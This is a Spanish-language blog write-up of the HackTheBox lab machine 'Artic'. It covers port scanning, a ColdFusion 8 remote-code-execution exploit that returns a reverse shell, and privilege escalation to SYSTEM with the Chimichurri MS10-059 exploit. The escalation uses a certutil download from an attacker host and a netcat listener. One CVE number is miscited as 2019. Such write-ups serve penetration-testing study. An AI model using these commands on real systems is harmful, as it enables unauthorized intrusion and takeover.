Post

HackTheBox - Artic

Máquina Windows de nivel Easy de HackTheBox.

Técnicas usadas: ColdFusion 8 RCE (CVE-2009-2265), Chimichurri (MS10-059)

Fase de Reconocimiento 🧣

a. Enumeramos los puertos que están abiertos en la Máquina Artic

  • nmap -p- -sS -Pn -n <IP> -oG puertos

b. Vemos las versiones de los servicios que se están ejecutando en los puertos.

  • nmap -p<Ports> -sCV <IP> -oN versiones

    • El puerto 8500 es usado por ColdFusion para la comunicación segura (SSL)
  • Wappalyzer detecta que el servicio es Adobe ColdFusion, además, ver un directorio CFIDE también es señal de que el servicio es Cold Fusión

  • Existen rutas a las cuales podemos acceder y obtener más información.

    1
    2
    
      - CFIDE/administrator/settings/mappings.cfm
      - CFIDE/administrator/enter.cfm
    

c. Si buscamos por exploits referentes a ColdFusion 8 encontramos esto CVE-2019-2265

  • Modificamos el script

    1
    2
    3
    4
    5
    6
    
      if __name__ == '__main__':
        # Define some information
        lhost = '<tun0 IP>'
        lport = 443
        rhost = "<Artic IP>"
        rport = 8500
    
  • Ejecutamos el script y ya tendremos una shell

    root@kali> python coldfusion.py
    <SNIP>
    C:\ColdFusion8\runtime\bin>whoami
    whoami
    arctic\tolis
    

Escalada de Privilegios 💹

a. Usaermos Window-Exploit-Suggestor para encontrar maneras de escalar privilegios, para esto, guardaremos el output del comando systeminfo en un fichero que le pasaremos a este script.

El script al ser antiguo nos puede dar problemas al ejecutarlo, algunas soluciones: La base de datos a usar la podemos descargar de: https://github.com/SecWiki/windows-kernel-exploits/tree/master/win-exp-suggester Para solucionar el error de fichero no soportado instalamos esto pip install xlrd==1.2.0

1
2
3
4
root@kali> python2 windows-exploit-suggestor.py --database 2017-06-14-mssb.xls --systeminfo systeminfo

<SNIP>
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important

b. En base a lo descubierto anteriormente encontramos este exploit Chimichurri - MS10-059

  • Lo transferimos a la Máquina Artic

    1
    2
    3
    
    root@kali> python -m http.server 8080
    ---------------------------------------------------------------------------------------------------
    C:\Users\tolis>certutil -urlcache -split -f http://<tun0 IP>:8080/Chimichurri.exe Chimichurri.exe
    

c. Nos ponemos en escucha con nc en un puerto y nos enviamos una reverse shell

1
2
3
4
5
6
7
8
9
C:\Users\tolis>.\Chimichurri.exe <tun0 IP> 443
------------------------------------------------
root@kali> nc -lvnp 443
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.11] 49404
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\tolis>whoami
whoami
nt authority\system
This post is licensed under CC BY 4.0 by the author.